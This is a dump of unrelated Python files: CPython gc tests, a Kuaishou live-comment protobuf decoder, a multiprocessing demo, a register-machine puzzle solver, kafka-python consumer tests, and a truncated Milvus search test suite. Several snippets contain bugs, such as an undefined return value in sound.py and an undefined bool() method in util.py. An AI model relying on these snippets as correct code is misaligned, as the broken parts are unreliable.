@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncolectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
util.py |
import time
class MessageDecode:
def __init__(self, buf):
self.buf = buf
self.pos = 0
self.message = {}
def __len__(self):
return len(self.buf)
def int_(self):
res = 0
i = 0
while self.buf[self.pos] >= 128:
res = res | (127 & self.buf[self.pos]) << 7 * i
self.pos += 1
i += 1
res = res | self.buf[self.pos] << 7 * i
self.pos += 1
return res
@staticmethod
def hex_(n):
res = []
while n > 128:
res.append(int((n & 127) | 128))
n = n >> 7
res.append(int(n))
return res
def bytes(self):
e = self.int_()
if e + self.pos > len(self.buf):
raise Exception('长度不匹配')
res = self.buf[self.pos:e + self.pos]
self.pos += e
return res
def skip(self, e=None):
"""跳过多少字节"""
if e is None:
while self.pos < len(self.buf):
if 128 & self.buf[self.pos] == 0:
self.pos += 1
return
self.pos += 1
return
self.pos += e
if self.pos >= len(self.buf):
self.pos -= 1
def skipType(self, e):
if e == 0:
self.skip()
elif e == 1:
self.skip(8)
elif e == 2:
self.skip(self.int_())
elif e == 3:
while True:
e = 7 & self.int_()
if 4 != e:
self.skipType(e)
elif e == 5:
self.skip(4)
else:
raise Exception('跳过类型错误')
def decode(self):
"""只处理弹幕"""
length = len(self)
while self.pos < length:
t = self.int_()
tt = t >> 3
if tt == 1:
self.message['payloadType'] = self.int_()
if self.message['payloadType'] != 310: # 非弹幕
return False
elif tt == 2:
self.message['compressionType'] = self.int_()
elif tt == 3:
self.message['payload'] = self.bytes()
else:
self.skipType(t & 7)
return True
def string(self):
e = self.bytes()
n = len(e)
if n < 1:
return ""
s = []
t = 0
while t < n:
r = e[t]
t += 1
if r < 128:
s.append(r)
elif 191 < r < 224:
s.append((31 & r) << 6 | 63 & e[t])
t += 1
elif 239 < r < 365:
x = (7 & r) << 18 | (63 & e[t]) << 12
t += 1
y = (63 & e[t]) << 6
t += 1
z = 63 & e[t]
t += 1
r = (x | y | z) - 65536
s.append(55296 + (r >> 10))
s.append(56320 + (1023 & r))
else:
x = (15 & r) << 12
y = (63 & e[t]) << 6
t += 1
z = 63 & e[t]
t += 1
s.append(x | y | z)
string = ''
for w in s:
string += chr(w)
return string
def user_info_decode(self, r, l):
c = self.pos + l
m = {}
while self.pos < c:
t = self.int_()
tt = t >> 3
if tt == 1:
m['principalId'] = self.string()
elif tt == 2:
m['userName'] = self.string()
elif tt == 3:
m['headUrl'] = self.string()
else:
self.skipType(t & 7)
return m
def web_like_feed_decode(self, r, l):
c = self.pos + l
m = {}
while self.pos < c:
t = self.int_()
tt = t >> 3
if tt == 1:
m['id'] = self.string()
elif tt == 2:
m['user'] = self.user_info_decode(self.buf, self.int_())
elif tt == 3:
m['sortRank'] = self.int_()
elif tt == 4:
m['deviceHash'] = self.string()
else:
self.skipType(t & 7)
return m
def comment_decode(self, r, l):
c = self.pos + l
m = {}
while self.pos < c:
t = self.int_()
tt = t >> 3
if tt == 1:
m['id'] = self.string()
elif tt == 2:
m['user'] = self.user_info_decode(self.buf, self.int_())
elif tt == 3:
m['content'] = self.string()
elif tt == 4:
m['deviceHash'] = self.string()
elif tt == 5:
m['sortRank'] = self.int_()
elif tt == 6:
m['color'] = self.string()
elif tt ==7:
m['showType']=self.int_()
else:
self.skipType(t & 7)
return m
def gift_decode(self, r, l):
c = self.pos + l
m = {}
while self.pos < c:
t = self.int_()
tt = t >> 3
if tt == 1:
m['id'] = self.string()
elif tt == 2:
m['user'] = self.user_info_decode(self.buf, self.int_())
elif tt == 3:
m['time'] = self.int_()
elif tt == 4:
m['giftId'] = self.int_()
elif tt == 5:
m['sortRank'] = self.int_()
elif tt == 6:
m['mergeKey'] = self.string()
elif tt == 7:
m['batchSize'] = self.int_()
elif tt == 8:
m['comboCount'] = self.int_()
elif tt == 9:
m['rank'] = self.int_()
elif tt == 10:
m['expireDuration'] = self.int_()
elif tt == 11:
m['clientTimestamp'] = self.int_()
elif tt == 12:
m['slotDisplayDuration'] = self.int_()
elif tt == 13:
m['starLevel'] = self.int_()
elif tt == 14:
m['styleType'] = self.int_()
elif tt == 15:
m['liveAssistantType'] = self.int_()
elif tt == 16:
m['deviceHash'] = self.string()
elif tt == 17:
m['danmakuDisplay'] = self.bool()
else:
self.skipType(t & 7)
return m
def feed_decode(self):
self.pos = 0
self.buf = self.message['payload']
length = len(self.buf)
while self.pos < length:
t = self.int_()
tt = t >> 3
if tt == 1:
self.message['displayWatchingCount'] = self.string()
print("观看人数:" + self.message['displayWatchingCount'])
elif tt == 2:
self.message['displayLikeCount'] = self.string()
# print("点赞数:" + self.message['displayLikeCount'])
elif tt == 5:
if not self.message.get('user'):
self.message['user'] = []
self.message['user'].append(self.comment_decode(self.buf, self.int_()))
elif tt==6:
self.string()
elif tt==8:
self.web_like_feed_decode(self.buf, self.int_())
elif tt == 9: # 礼物
if not self.message.get('gift'):
self.message['gift'] = []
self.message['gift'].append(self.gift_decode(self.buf, self.int_()))
if __name__ == '__main__':
pass
# from tkinter import Tk, END, Label, Entry,W,E,Button,Text
# root = Tk()
# root.title('快手弹幕收集工具')
# root.geometry('660x450+500+200')
# lable = Label(root, text='请输入主播id:', font=('楷体', 20))
# lable3 = Label(root, text='请输入房间id:', font=('楷体', 20))
# lable2 = Label(root, text='请输入你的cookie:', font=('楷体', 20))
# lable.grid()
# lable2.grid()
# lable3.grid()
# entry = Entry(root, font=('楷体', 20))
# entry2 = Entry(root, font=('楷体', 20))
# entry3 = Entry(root, font=('楷体', 20))
# entry2.grid(row=1, column=1)
# entry3.grid(row=2, column=1)
# entry.grid(row=0, column=1)
#
# import threading
# def thread_it(func, *args):
# t = threading.Thread(target=func, args=args)
# t.setDaemon(True)
# t.start()
#
# def get_uid():
# return entry.get()
#
# def get_ck():
# return entry2.get()
#
# def get_stream_id():
# return entry3.get()
#
# def main():
# text1.insert(END,"正在启动任务\n")
# uid = get_uid()
# did = get_ck()
# stream_id = get_stream_id()
# spider = Spider(uid, Client, did, stream_id)
# spider.run()
#
#
# button1 = Button(root, text='开始任务', font=('楷体', 18), command=lambda: thread_it(main,))
# button2 = Button(root, text='退出程序', font=('楷体', 18), command=root.quit)
# button1.grid(row=3, column=0, sticky=W,padx=20, pady=20)
# button2.grid(row=3, column=1, sticky=E,padx=20, pady=20)
# text1 = Text(root, width=30, height=10)
# text1.grid()
# root.mainloop()
|
multipcheck.py | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 6 18:45:21 2019
@author: admin
"""
from multiprocessing import Lock, Process, Queue, current_process
import time
import queue # imported for using queue.Empty exception
def do_job(tasks_to_accomplish, tasks_that_are_done):
while True:
try:
'''
try to get task from the queue. get_nowait() function will
raise queue.Empty exception if the queue is empty.
queue(False) function would do the same task also.
'''
task = tasks_to_accomplish.get_nowait()
except queue.Empty:
break
else:
'''
if no exception has been raised, add the task completion
message to task_that_are_done queue
'''
print(task)
tasks_that_are_done.put(task + ' is done by ' + current_process().name)
time.sleep(.5)
return True
def main():
number_of_task = 10
number_of_processes = 4
tasks_to_accomplish = Queue()
tasks_that_are_done = Queue()
processes = []
for i in range(number_of_task):
tasks_to_accomplish.put("Task no " + str(i))
# creating processes
for w in range(number_of_processes):
p = Process(target=do_job, args=(tasks_to_accomplish, tasks_that_are_done))
processes.append(p)
p.start()
# completing process
for p in processes:
p.join()
# print the output
while not tasks_that_are_done.empty():
print(tasks_that_are_done.get())
return True
if __name__ == '__main__':
main() |
sound.py | from multiprocessing import Process, Queue, Value, Semaphore
def get_val(regs, val):
if val.isalpha():
return regs[val]
else:
return int(val)
def second(instructions, send, receive, counter, sem, default):
regs = {}
i = 0
while 0 <= i < len(instructions):
instr = instructions[i].split()
cmd = instr[0]
# handle new keys
if instr[1] not in regs:
regs[instr[1]] = default
if len(instr) == 3 and instr[2] not in regs and instr[2].isalpha():
regs[instr[2]] = default
if cmd == 'snd':
send.put(regs[instr[1]])
sem.release()
counter.value += 1
elif cmd == 'set':
regs[instr[1]] = get_val(regs, instr[2])
elif cmd == 'add':
regs[instr[1]] += get_val(regs, instr[2])
elif cmd == 'mul':
regs[instr[1]] *= get_val(regs, instr[2])
elif cmd == 'mod':
regs[instr[1]] = regs[instr[1]] % get_val(regs, instr[2])
elif cmd == 'rcv':
sem.acquire()
regs[instr[1]] = receive.get()
elif cmd == 'jgz':
val = get_val(regs, instr[1])
if val > 0:
i += get_val(regs, instr[2])
continue
i+=1
return sound
def solve_second(instructions):
p0in, p1in = Queue(), Queue()
p0val, p1val = Value('i', 0), Value('i', 0)
sem = Semaphore(2)
p0 = Process(target=second, args=(instructions, p0in, p1in, p0val, sem, 0,))
p1 = Process(target=second, args=(instructions, p1in, p0in, p1val, sem, 1,))
p0.start()
p1.start()
# wait till we're either deadlocked or we're finished
while(p0.is_alive() and p1.is_alive()):
if sem.acquire(False): sem.release()
else: break
p0.terminate()
p1.terminate()
return p1val.value
def first(instructions):
regs = {}
sound = 0
i = 0
while 0 <= i < len(instructions):
instr = instructions[i].split()
cmd = instr[0]
# handle new keys
if instr[1] not in regs:
regs[instr[1]] = 0
if len(instr) == 3 and instr[2] not in regs and instr[2].isalpha():
regs[instr[2]] = 0
if cmd == 'snd':
sound = regs[instr[1]]
elif cmd == 'set':
regs[instr[1]] = get_val(regs, instr[2])
elif cmd == 'add':
regs[instr[1]] += get_val(regs, instr[2])
elif cmd == 'mul':
regs[instr[1]] *= get_val(regs, instr[2])
elif cmd == 'mod':
regs[instr[1]] = regs[instr[1]] % get_val(regs, instr[2])
elif cmd == 'rcv':
if regs[instr[1]] != 0:
return sound
elif cmd == 'jgz':
val = get_val(regs, instr[1])
if val > 0:
i = i + get_val(regs, instr[2])
continue
i+=1
return sound
with open('input.in') as f:
instructions = f.read().splitlines()
print(first(instructions))
print(solve_second(instructions))
|
test_consumer_group.py | import collections
import logging
import threading
import time
import pytest
import six
from kafka import SimpleClient
from kafka.conn import ConnectionStates
from kafka.consumer.group import KafkaConsumer
from kafka.structs import TopicPartition
from test.conftest import version
from test.testutil import random_string
def get_connect_str(kafka_broker):
return 'localhost:' + str(kafka_broker.port)
@pytest.fixture
def simple_client(kafka_broker):
return SimpleClient(get_connect_str(kafka_broker))
@pytest.fixture
def topic(simple_client):
topic = random_string(5)
simple_client.ensure_topic_exists(topic)
return topic
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_consumer(kafka_broker, version):
# 0.8.2 brokers need a topic to function well
if version >= (0, 8, 2) and version < (0, 9):
topic(simple_client(kafka_broker))
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
consumer.poll(500)
assert len(consumer._client._conns) > 0
node_id = list(consumer._client._conns.keys())[0]
assert consumer._client._conns[node_id].state is ConnectionStates.CONNECTED
@pytest.mark.skipif(version() < (0, 9), reason='Unsupported Kafka Version')
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_group(kafka_broker, topic):
num_partitions = 4
connect_str = get_connect_str(kafka_broker)
consumers = {}
stop = {}
threads = {}
messages = collections.defaultdict(list)
group_id = 'test-group-' + random_string(6)
def consumer_thread(i):
assert i not in consumers
assert i not in stop
stop[i] = threading.Event()
consumers[i] = KafkaConsumer(topic,
bootstrap_servers=connect_str,
group_id=group_id,
heartbeat_interval_ms=500)
while not stop[i].is_set():
for tp, records in six.itervalues(consumers[i].poll(100)):
messages[i][tp].extend(records)
consumers[i].close()
del consumers[i]
del stop[i]
num_consumers = 4
for i in range(num_consumers):
t = threading.Thread(target=consumer_thread, args=(i,))
t.start()
threads[i] = t
try:
timeout = time.time() + 35
while True:
for c in range(num_consumers):
# Verify all consumers have been created
if c not in consumers:
break
# Verify all consumers have an assignment
elif not consumers[c].assignment():
break
# If all consumers exist and have an assignment
else:
# Verify all consumers are in the same generation
# then log state and break while loop
generations = set([consumer._coordinator.generation
for consumer in list(consumers.values())])
# New generation assignment is not complete until
# coordinator.rejoining = False
rejoining = any([consumer._coordinator.rejoining
for consumer in list(consumers.values())])
if not rejoining and len(generations) == 1:
for c, consumer in list(consumers.items()):
logging.info("[%s] %s %s: %s", c,
consumer._coordinator.generation,
consumer._coordinator.member_id,
consumer.assignment())
break
assert time.time() < timeout, "timeout waiting for assignments"
group_assignment = set()
for c in range(num_consumers):
assert len(consumers[c].assignment()) != 0
assert set.isdisjoint(consumers[c].assignment(), group_assignment)
group_assignment.update(consumers[c].assignment())
assert group_assignment == set([
TopicPartition(topic, partition)
for partition in range(num_partitions)])
finally:
for c in range(num_consumers):
stop[c].set()
threads[c].join()
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_paused(kafka_broker, topic):
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
topics = [TopicPartition(topic, 1)]
consumer.assign(topics)
assert set(topics) == consumer.assignment()
assert set() == consumer.paused()
consumer.pause(topics[0])
assert set([topics[0]]) == consumer.paused()
consumer.resume(topics[0])
assert set() == consumer.paused()
consumer.unsubscribe()
assert set() == consumer.paused()
|
test_search.py | import time
import pdb
import copy
import logging
from multiprocessing import Pool, Process
import pytest
import numpy as np
from pymilvus import DataType
from utils import *
from constants import *
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, default_query_vecs = gen_query_vectors(field_name, entities, default_top_k, nq)
default_binary_query, default_binary_query_vecs = gen_query_vectors(binary_field_name, binary_entities, default_top_k,
nq)
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
'''
Generate entities and add it in collection
'''
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_names is None:
if auto_id:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)])
else:
if auto_id:
ids = connect.insert(collection, insert_entities, partition_name=partition_names)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)], partition_name=partition_names)
connect.flush([collection])
return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
'''
Generate entities and add it in collection
'''
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_names is None:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
return insert_raw_vectors, insert_entities, ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_flat(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_search_flat_top_k(self, connect, collection, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = 16385
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function before and after deletion, all the search params is
correct, change top-k value.
check issue <a href="https://github.com/milvus-io/milvus/issues/4200">#4200</a>
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.level(2)
def test_search_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
def test_search_after_index_different_metric_type(self, connect, collection, get_simple_index):
'''
target: test search with different metric_type
method: build index with L2, and search using IP
expected: search ok
'''
search_metric_type = "IP"
index_type = get_simple_index["index_type"]
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, metric_type=search_metric_type,
search_params=search_param)
connect.load_collection(collection)
if index_type == "FLAT":
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
assert res[0]._distances[0] > res[0]._distances[default_top_k - 1]
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.level(2)
@pytest.mark.timeout(600)
def test_search_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_names=[default_tag])
else:
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res) == nq
assert len(res[0]) == top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_index_partition_not_existed(self, connect, collection, get_top_k, get_nq, get_simple_index):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors and tag (tag name not existed in collection), check the result
expected: error raised
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_names=["new_tag"])
else:
connect.load_collection(collection)
with pytest.raises(Exception) as e:
connect.search(collection, query, partition_names=["new_tag"])
@pytest.mark.level(2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_names=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.level(2)
def test_search_index_partitions_B(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
tag = "tag"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
